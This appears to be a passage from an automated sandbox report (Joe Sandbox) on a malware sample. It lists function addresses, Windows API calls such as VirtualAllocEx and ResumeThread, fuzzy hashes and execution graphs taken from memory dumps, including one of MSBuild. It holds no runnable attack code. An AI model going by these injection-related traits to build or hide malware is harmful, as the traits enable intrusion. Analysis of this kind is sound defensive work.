                                                                                                                              • API String ID: 3793708945-0
                                                                                                                              • Opcode ID: e636a66f9dfcb406610bc5479ceb0852add45634b252f89e92720717d28dbebc
                                                                                                                              • Instruction ID: 0b31f7ff0fdfb1b70e4dfe795a649fc167ab1f6521997341d96b9ad0aef5575f
                                                                                                                              • Opcode Fuzzy Hash: e636a66f9dfcb406610bc5479ceb0852add45634b252f89e92720717d28dbebc
                                                                                                                              • Instruction Fuzzy Hash: 3021F0B9900219DFDB10CFA9D984ADEBBF5FB48314F14841AE918B3350D378A954CFA5
                                                                                                                              Function 076C1254 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 263 76c1254-76c3534 CreateIconFromResourceEx 265 76c353d-76c355a 263->265 266 76c3536-76c353c 263->266 266->265
                                                                                                                              APIs
                                                                                                                              • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,076C3482,?,?,?,?,?), ref: 076C3527
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2543965316.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_76c0000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFromIconResource
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3668623891-0
                                                                                                                              • Opcode ID: f476ff0c7a372fa7cbf0ad06a446c8f1ca5b0647da8aaefad36fe5a0f8dbb1fb
                                                                                                                              • Instruction ID: 7e45f7fce84b4eb482bf268d90aacd2579097ab04312cd69ab2f5f24e5c4c2a5
                                                                                                                              • Opcode Fuzzy Hash: f476ff0c7a372fa7cbf0ad06a446c8f1ca5b0647da8aaefad36fe5a0f8dbb1fb
                                                                                                                              • Instruction Fuzzy Hash: 9D1117B58002499FDB10DF9AD844AEEBFF8EB48320F14841AE515A7210C379A954DFA5
                                                                                                                              Function 076BE750 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 076BE7BE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2543892244.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_76b0000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4275171209-0
                                                                                                                              • Opcode ID: 3e1b1aede0b7560ca1f4c66df92dd9f359be6f62bb984069ad7674b145603f8a
                                                                                                                              • Instruction ID: cf9c3877a6d6d41bc0eaafe1310cc77602dae2df959bb5147a4446bbb7344ce8
                                                                                                                              • Opcode Fuzzy Hash: 3e1b1aede0b7560ca1f4c66df92dd9f359be6f62bb984069ad7674b145603f8a
                                                                                                                              • Instruction Fuzzy Hash: B61167759002499FDB10DFAAC844BDFBBF5EF88320F248819E519A7250C7359540CFA4
                                                                                                                              Function 076BE190 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2543892244.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_76b0000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ResumeThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 947044025-0
                                                                                                                              • Opcode ID: a8bf5e0d05d950deb504da577f5a9217f40e9d9efe70357c7e1decf41622fc7a
                                                                                                                              • Instruction ID: 90a4b213c026dae3218e12ee0915a7cf1a2916ed22f838df531da4112215c7c5
                                                                                                                              • Opcode Fuzzy Hash: a8bf5e0d05d950deb504da577f5a9217f40e9d9efe70357c7e1decf41622fc7a
                                                                                                                              • Instruction Fuzzy Hash: A81128B19003498FEB20DFAAC845BDEFBF5AF88624F248419D519A7240CB79A540CB95
                                                                                                                              Function 016EB298 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 016EB2FE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2538526807.00000000016E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_16e0000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4139908857-0
                                                                                                                              • Opcode ID: 8d91c59933c975a6bfe96aa67763c739cfafa3ad97e2b0edd7997504db14a43c
                                                                                                                              • Instruction ID: 9e416f695b6267dc66de5cac52d218325de3ce7f4328ca1299940abe78b97771
                                                                                                                              • Opcode Fuzzy Hash: 8d91c59933c975a6bfe96aa67763c739cfafa3ad97e2b0edd7997504db14a43c
                                                                                                                              • Instruction Fuzzy Hash: C01110B5C006498FDB10CF9AC844ADEFBF4AF88324F10851AD919A7210D379A545CFA5
                                                                                                                              Function 0BB91CC8 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • PostMessageW.USER32(?,?,?,?), ref: 0BB91D25
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2546795081.000000000BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BB90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_bb90000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePost
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 410705778-0
                                                                                                                              • Opcode ID: 3cdcad95e06505c2f76a3d7bb55f39d26cd1fc6f7ee813a6d96897c10aa24ead
                                                                                                                              • Instruction ID: ef59f212a77f406ec7bf205a9c4d559040982a05ebd43adc8f5ac6d6452d33e4
                                                                                                                              • Opcode Fuzzy Hash: 3cdcad95e06505c2f76a3d7bb55f39d26cd1fc6f7ee813a6d96897c10aa24ead
                                                                                                                              • Instruction Fuzzy Hash: 601115B5800349DFDB10CF9AD844BDEFBF8EB48724F108459E518A7200C375A544CFA5
                                                                                                                              Function 0BB91CC1 Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • PostMessageW.USER32(?,?,?,?), ref: 0BB91D25
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2546795081.000000000BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BB90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_bb90000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePost
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 410705778-0
                                                                                                                              • Opcode ID: 938800ad1283a56c502e8f81c32a9939e735b5d46ad10337d1c95ac9fb57f391
                                                                                                                              • Instruction ID: 69bd4101bd94bb346b47c2f0e8558eebd9868ff8c7d14774b6f50e505cfc05ee
                                                                                                                              • Opcode Fuzzy Hash: 938800ad1283a56c502e8f81c32a9939e735b5d46ad10337d1c95ac9fb57f391
                                                                                                                              • Instruction Fuzzy Hash: E511F2B5800249DFDB10CF99D985BDEBBF4EF48324F10885AD558A7600C375A554CFA5
                                                                                                                              Function 0143D4C4 Relevance: .1, Instructions: 75COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2535891210.000000000143D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_143d000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 00481569e119684b69af0e6b679208c48af12ff9b69160ebb0b29d2d0f8b4b4b
                                                                                                                              • Instruction ID: d388d68fbef978c2c2758fa6fc855ea543040c13c701642701d85dc851d7ea3e
                                                                                                                              • Opcode Fuzzy Hash: 00481569e119684b69af0e6b679208c48af12ff9b69160ebb0b29d2d0f8b4b4b
                                                                                                                              • Instruction Fuzzy Hash: B521D372904244EFDB05DF54D9C0B27BF65FBC8318F64C56EE9090B2A6C336D456CAA1
                                                                                                                              Function 0143D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2535891210.000000000143D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_143d000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b66ef62bfd8d49229774f7b8ae5bcc1953dd9b10874676ea02fa655c4be51ff8
                                                                                                                              • Instruction ID: 348ae1334fdd6229521c94119fcc0cbd00551fe90696f40b56c117ae7f90130a
                                                                                                                              • Opcode Fuzzy Hash: b66ef62bfd8d49229774f7b8ae5bcc1953dd9b10874676ea02fa655c4be51ff8
                                                                                                                              • Instruction Fuzzy Hash: A421F171904204DFDB05DF54D9C0B56BB65FBD8324F60C57EE9090B266C336E456CBA1
                                                                                                                              Function 0144D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2536130486.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_144d000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4b806c8468f3644ec208b809776bdcd14c32df4f0f9e17bdf92dde75699c28ee
                                                                                                                              • Instruction ID: 4354eccb259841ccba3bacd7aef175e56b0f9ec5e0832efe2c149410374c43a3
                                                                                                                              • Opcode Fuzzy Hash: 4b806c8468f3644ec208b809776bdcd14c32df4f0f9e17bdf92dde75699c28ee
                                                                                                                              • Instruction Fuzzy Hash: F921F671A04204EFEB05DF94D9C4B26BBA5FB94324F24C66EE9094B3A2C376D446CB61
                                                                                                                              Function 0144D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2536130486.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_144d000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ac6ff07262fc68b794f9a61861c12f703a50c3f59aa2220d8ca75ca76327eb26
                                                                                                                              • Instruction ID: 795b7c3392f5254340592e91f55d9c80b0e48d6d66abf83d091d7109ebc4d7a5
                                                                                                                              • Opcode Fuzzy Hash: ac6ff07262fc68b794f9a61861c12f703a50c3f59aa2220d8ca75ca76327eb26
                                                                                                                              • Instruction Fuzzy Hash: 922134B1A04200DFEB15DF94D9C4B16BBA1FB94318F20C56ED90A4B3A6C33AD447CA61
                                                                                                                              Function 0144D006 Relevance: .1, Instructions: 62COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2536130486.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_144d000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 580b19823136bd892af40b73a7b9f662dcaa55357dcf41b10815dfcf4636f205
                                                                                                                              • Instruction ID: b3f0dab50ec9f94e831fe9848b68fb3882e735d3630434b98e2ccd9e74b20879
                                                                                                                              • Opcode Fuzzy Hash: 580b19823136bd892af40b73a7b9f662dcaa55357dcf41b10815dfcf4636f205
                                                                                                                              • Instruction Fuzzy Hash: 232192755093808FDB17CF64D594716BF71EB46218F28C5DBD8498F2A7C33A980ACB62
                                                                                                                              Function 0143D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2535891210.000000000143D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_143d000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
                                                                                                                              • Instruction ID: 46a925a21d4bb80b96f13fc05bc249a2953835c35dcdd2f6ed371a5cc36c1052
                                                                                                                              • Opcode Fuzzy Hash: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
                                                                                                                              • Instruction Fuzzy Hash: CC11DF72804240CFCB02CF54D9C0B56BF71FB98324F24C2AAD8090B267C33AE456CBA1
                                                                                                                              Function 0143D4BF Relevance: .1, Instructions: 56COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2535891210.000000000143D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_143d000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
                                                                                                                              • Instruction ID: 18ad5d6ea22bf1cc0d1ab87174a1bcbf6b84c9fa5109fa33d2ca736a9080b2f8
                                                                                                                              • Opcode Fuzzy Hash: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
                                                                                                                              • Instruction Fuzzy Hash: 3411B176904280CFDB16CF54D9C4B16BF71FB88328F24C6AAD8490B667C33AD456CBA1
                                                                                                                              Function 0144D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2536130486.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_144d000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f5dd070f47a673dda7babee824c8441981cc2d376d27ad6ac8e2bf7ef2f1688d
                                                                                                                              • Instruction ID: 5fc9057dd68cd8d95f6ebae4de6bfba60bf8bbd8cd10f1c03672f2c7ed6d4e20
                                                                                                                              • Opcode Fuzzy Hash: f5dd070f47a673dda7babee824c8441981cc2d376d27ad6ac8e2bf7ef2f1688d
                                                                                                                              • Instruction Fuzzy Hash: 2B11BB75904280DFDB02CF54C5C4B16BBA1FB84224F24C6AAD8494B3A6C33AD40ACB61
                                                                                                                              Function 0143D745 Relevance: .0, Instructions: 45COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2535891210.000000000143D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_143d000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9b597cd882efb74a5aaf1742a213b544858d4ec1e7f205f89bb9f56cbb33300f
                                                                                                                              • Instruction ID: 1939e6916a092b4b2ffb249c4fd5e3b6b42425e8afa424af281d20ce022bd84f
                                                                                                                              • Opcode Fuzzy Hash: 9b597cd882efb74a5aaf1742a213b544858d4ec1e7f205f89bb9f56cbb33300f
                                                                                                                              • Instruction Fuzzy Hash: 9D01F7319043849AF7125EA9CD84B67BF98EF89264F58851BEE080A392D339D442C671
                                                                                                                              Function 0143D744 Relevance: .0, Instructions: 36COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2535891210.000000000143D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_143d000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d0c1172fbfc7b8639952d190357b442151b90424d3f4dd1236772898e9fdb5bd
                                                                                                                              • Instruction ID: f333017141a7b93b754952343a2ccb65b6968f8d05b4995bd58c1dbf6c32212b
                                                                                                                              • Opcode Fuzzy Hash: d0c1172fbfc7b8639952d190357b442151b90424d3f4dd1236772898e9fdb5bd
                                                                                                                              • Instruction Fuzzy Hash: 1DF0CD75804384AAE7118E1ACC88B63FF98EB85634F18C05AED080A396C3799840CAB1

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:10.3%
                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                              Signature Coverage:2.2%
                                                                                                                              Total number of Nodes:184
                                                                                                                              Total number of Limit Nodes:14
                                                                                                                              execution_graph 59736 119c238 59737 119c540 59736->59737 59738 119c260 59736->59738 59739 119c269 59738->59739 59742 119b704 59738->59742 59741 119c28c 59743 119b70f 59742->59743 59744 119c583 59743->59744 59746 119b720 59743->59746 59744->59741 59747 119c5b8 OleInitialize 59746->59747 59748 119c61c 59747->59748 59748->59744 59839 1195488 59841 11955b9 59839->59841 59842 11954b9 59839->59842 59840 11954c5 59842->59840 59848 1195700 59842->59848 59852 11956f0 59842->59852 59843 1195505 59856 11969f0 59843->59856 59868 1196a00 59843->59868 59880 1195750 59848->59880 59890 1195740 59848->59890 59849 119570a 59849->59843 59853 119570a 59852->59853 59854 1195750 2 API calls 59852->59854 59855 1195740 2 API calls 59852->59855 59853->59843 59854->59853 59855->59853 59857 1196a2b 59856->59857 59858 1194ce4 GetModuleHandleW 59857->59858 59859 1196a92 59858->59859 59865 1194ce4 GetModuleHandleW 59859->59865 59906 1196eb1 59859->59906 59860 1196aae 59861 1194c14 GetModuleHandleW 59860->59861 59863 1196ada 59860->59863 59862 1196b1e 59861->59862 59911 1197870 59862->59911 59915 11978e0 59862->59915 59865->59860 59869 1196a2b 59868->59869 59870 1194ce4 GetModuleHandleW 59869->59870 59871 1196a92 59870->59871 59876 1196eb1 GetModuleHandleW 59871->59876 59877 1194ce4 GetModuleHandleW 59871->59877 59872 1196aae 59873 1196ada 59872->59873 59874 1194c14 GetModuleHandleW 59872->59874 59873->59873 59875 1196b1e 59874->59875 59878 1197870 CreateWindowExW 59875->59878 59879 11978e0 CreateWindowExW 59875->59879 59876->59872 59877->59872 59878->59873 59879->59873 59881 1195761 59880->59881 59884 1195784 59880->59884 59882 1194c14 GetModuleHandleW 59881->59882 59883 119576c 59882->59883 59883->59884 59900 11959d8 59883->59900 59903 11959e8 59883->59903 59884->59849 59885 119577c 59885->59884 59886 1195988 GetModuleHandleW 59885->59886 59887 11959b5 59886->59887 59887->59849 59891 1195761 59890->59891 59894 1195784 59890->59894 59892 1194c14 GetModuleHandleW 59891->59892 59893 119576c 59892->59893 59893->59894 59898 11959d8 GetModuleHandleW 59893->59898 59899 11959e8 GetModuleHandleW 59893->59899 59894->59849 59895 1195988 GetModuleHandleW 59897 11959b5 59895->59897 59896 119577c 59896->59894 59896->59895 59897->59849 59898->59896 59899->59896 59901 1194c14 GetModuleHandleW 59900->59901 59902 11959fc 59901->59902 59902->59885 59904 1194c14 GetModuleHandleW 59903->59904 59905 11959fc 59903->59905 59904->59905 59905->59885 59907 1196ecb 59906->59907 59908 1196ecf 59906->59908 59907->59860 59909 119700e 59908->59909 59910 11970c1 GetModuleHandleW 59908->59910 59910->59909 59912 11978e0 59911->59912 59918 1194dcc 59912->59918 59916 1194dcc CreateWindowExW 59915->59916 59917 1197915 59916->59917 59917->59863 59919 1197930 CreateWindowExW 59918->59919 59921 1197a54 59919->59921 59922 2ebe018 59923 2ebe01a 59922->59923 59932 6ab2968 59923->59932 59925 2ebe0ed 59945 6abfc68 59925->59945 59949 6abfc5e 59925->59949 59926 2ebe61f 59933 6ab298a 59932->59933 59934 2ebe0c3 59933->59934 59953 6ab992c 59933->59953 59957 6ab9548 59933->59957 59937 6abe24b 59934->59937 59941 6abe258 59934->59941 59938 6abe27a 59937->59938 59939 6ab9548 LdrInitializeThunk 59938->59939 59940 6abe344 59938->59940 59939->59940 59940->59925 59942 6abe27a 59941->59942 59943 6ab9548 LdrInitializeThunk 59942->59943 59944 6abe344 59942->59944 59943->59944 59944->59925 59946 6abfc8a 59945->59946 59947 6ab9548 LdrInitializeThunk 59946->59947 59948 6abfd3a 59946->59948 59947->59948 59948->59926 59950 6abfc8a 59949->59950 59951 6ab9548 LdrInitializeThunk 59950->59951 59952 6abfd3a 59950->59952 59951->59952 59952->59926 59954 6ab97e3 59953->59954 59955 6ab9a69 LdrInitializeThunk 59954->59955 59956 6ab9a81 59955->59956 59956->59934 59960 6ab9579 59957->59960 59958 6ab96d9 59958->59934 59959 6ab9a69 LdrInitializeThunk 59959->59958 59960->59958 59960->59959 59749 2e2d044 59750 2e2d05c 59749->59750 59751 2e2d0b6 59750->59751 59757 1197ae8 59750->59757 59763 1197ad7 59750->59763 59769 1194de4 59750->59769 59773 1194df4 59750->59773 59781 119883c 59750->59781 59758 1197b0e 59757->59758 59759 1194de4 GetModuleHandleW 59758->59759 59760 1197b1a 59759->59760 59761 1194df4 CallWindowProcW 59760->59761 59762 1197b2f 59761->59762 59762->59751 59764 1197b0e 59763->59764 59765 1194de4 GetModuleHandleW 59764->59765 59766 1197b1a 59765->59766 59767 1194df4 CallWindowProcW 59766->59767 59768 1197b2f 59767->59768 59768->59751 59770 1194def 59769->59770 59791 1194e1c 59770->59791 59772 1197c27 59772->59751 59774 1194dff 59773->59774 59775 11988a9 59774->59775 59777 1198899 59774->59777 59778 11988a7 59775->59778 59825 1194f1c 59775->59825 59815 11989d0 59777->59815 59820 11989c0 59777->59820 59782 11988a8 59781->59782 59784 1198842 59781->59784 59783 1194f1c CallWindowProcW 59782->59783 59787 11988a7 59783->59787 59785 11988a9 59784->59785 59788 1198899 59784->59788 59786 1194f1c CallWindowProcW 59785->59786 59785->59787 59786->59787 59789 11989d0 CallWindowProcW 59788->59789 59790 11989c0 CallWindowProcW 59788->59790 59789->59787 59790->59787 59792 1194e27 59791->59792 59797 1194ce4 59792->59797 59796 1197cf8 59798 1194cef 59797->59798 59799 1196ecb 59798->59799 59805 11970c1 59798->59805 59799->59796 59801 1194c14 59799->59801 59802 1195940 GetModuleHandleW 59801->59802 59804 11959b5 59802->59804 59804->59796 59806 11970e5 59805->59806 59807 1194c14 GetModuleHandleW 59806->59807 59808 1197109 59806->59808 59807->59808 59809 1194c14 GetModuleHandleW 59808->59809 59814 11972c5 59808->59814 59810 119724b 59809->59810 59811 1194c14 GetModuleHandleW 59810->59811 59810->59814 59812 1197299 59811->59812 59813 1194c14 GetModuleHandleW 59812->59813 59812->59814 59813->59814 59814->59799 59817 11989e4 59815->59817 59816 1198a70 59816->59778 59829 1198a79 59817->59829 59832 1198a88 59817->59832 59822 11989d0 59820->59822 59821 1198a70 59821->59778 59823 1198a79 CallWindowProcW 59822->59823 59824 1198a88 CallWindowProcW 59822->59824 59823->59821 59824->59821 59826 1194f27 59825->59826 59827 119a10a CallWindowProcW 59826->59827 59828 119a0b9 59826->59828 59827->59828 59828->59778 59830 1198a99 59829->59830 59835 119a048 59829->59835 59830->59816 59833 119a048 CallWindowProcW 59832->59833 59834 1198a99 59832->59834 59833->59834 59834->59816 59836 119a04d 59835->59836 59837 1194f1c CallWindowProcW 59836->59837 59838 119a05a 59837->59838 59838->59830

                                                                                                                              Executed Functions

                                                                                                                              Function 02EBC146 Relevance: 4.0, Strings: 3, Instructions: 229COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 549 2ebc146-2ebc158 550 2ebc15a-2ebc172 549->550 551 2ebc184 549->551 555 2ebc17b-2ebc17e 550->555 556 2ebc174-2ebc179 550->556 552 2ebc186-2ebc18a 551->552 557 2ebc18b-2ebc199 555->557 558 2ebc180-2ebc182 555->558 556->552 560 2ebc19b-2ebc1a1 557->560 561 2ebc1f2-2ebc1f9 557->561 558->550 558->551 562 2ebc1fa-2ebc2ac call 2eb41a0 call 2eb3cc0 560->562 563 2ebc1a3-2ebc1c8 560->563 561->562 575 2ebc2ae 562->575 576 2ebc2b3-2ebc2d4 call 2eb5658 562->576 564 2ebc1ca 563->564 565 2ebc1cf-2ebc1ef 563->565 564->565 565->561 575->576 578 2ebc2d9-2ebc2e4 576->578 579 2ebc2eb-2ebc2ef 578->579 580 2ebc2e6 578->580 581 2ebc2f1-2ebc2f2 579->581 582 2ebc2f4-2ebc2fb 579->582 580->579 583 2ebc313-2ebc357 581->583 584 2ebc2fd 582->584 585 2ebc302-2ebc310 582->585 589 2ebc3bd-2ebc3d4 583->589 584->585 585->583 591 2ebc359-2ebc36f 589->591 592 2ebc3d6-2ebc3fb 589->592 596 2ebc399 591->596 597 2ebc371-2ebc37d 591->597 599 2ebc3fd-2ebc412 592->599 600 2ebc413 592->600 598 2ebc39f-2ebc3bc 596->598 601 2ebc37f-2ebc385 597->601 602 2ebc387-2ebc38d 597->602 598->589 599->600 603 2ebc397 601->603 602->603 603->598
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0op$Ljp$Ljp
                                                                                                                              • API String ID: 0-600165640
                                                                                                                              • Opcode ID: 9da291daf1f1ed864637551b54fbc7e089253b243cdd1ca900fe4591bddb8cc9
                                                                                                                              • Instruction ID: c5fb97d6bc7f7fcb043870aa8c1419d0a903505e02ae5474de2d9ed90a44a497
                                                                                                                              • Opcode Fuzzy Hash: 9da291daf1f1ed864637551b54fbc7e089253b243cdd1ca900fe4591bddb8cc9
                                                                                                                              • Instruction Fuzzy Hash: 17A1D974E44258CFDB15CFA9D884A9EBBF2BF89314F24D0AAE409AB351DB349841CF50
                                                                                                                              Function 02EB5362 Relevance: 3.9, Strings: 3, Instructions: 193COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 607 2eb5362-2eb5364 608 2eb5366-2eb53a0 607->608 609 2eb53c4-2eb5484 call 2eb41a0 call 2eb3cc0 607->609 610 2eb53a2 608->610 611 2eb53a7-2eb53c2 608->611 621 2eb548b-2eb54a9 609->621 622 2eb5486 609->622 610->611 611->609 652 2eb54ac call 2eb5649 621->652 653 2eb54ac call 2eb5658 621->653 622->621 623 2eb54b2-2eb54bd 624 2eb54bf 623->624 625 2eb54c4-2eb54c8 623->625 624->625 626 2eb54ca-2eb54cb 625->626 627 2eb54cd-2eb54d4 625->627 628 2eb54ec-2eb5530 626->628 629 2eb54db-2eb54e9 627->629 630 2eb54d6 627->630 634 2eb5596-2eb55ad 628->634 629->628 630->629 636 2eb55af-2eb55d4 634->636 637 2eb5532-2eb5548 634->637 643 2eb55ec 636->643 644 2eb55d6-2eb55eb 636->644 641 2eb554a-2eb5556 637->641 642 2eb5572 637->642 645 2eb5558-2eb555e 641->645 646 2eb5560-2eb5566 641->646 647 2eb5578-2eb5595 642->647 644->643 648 2eb5570 645->648 646->648 647->634 648->647 652->623 653->623
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
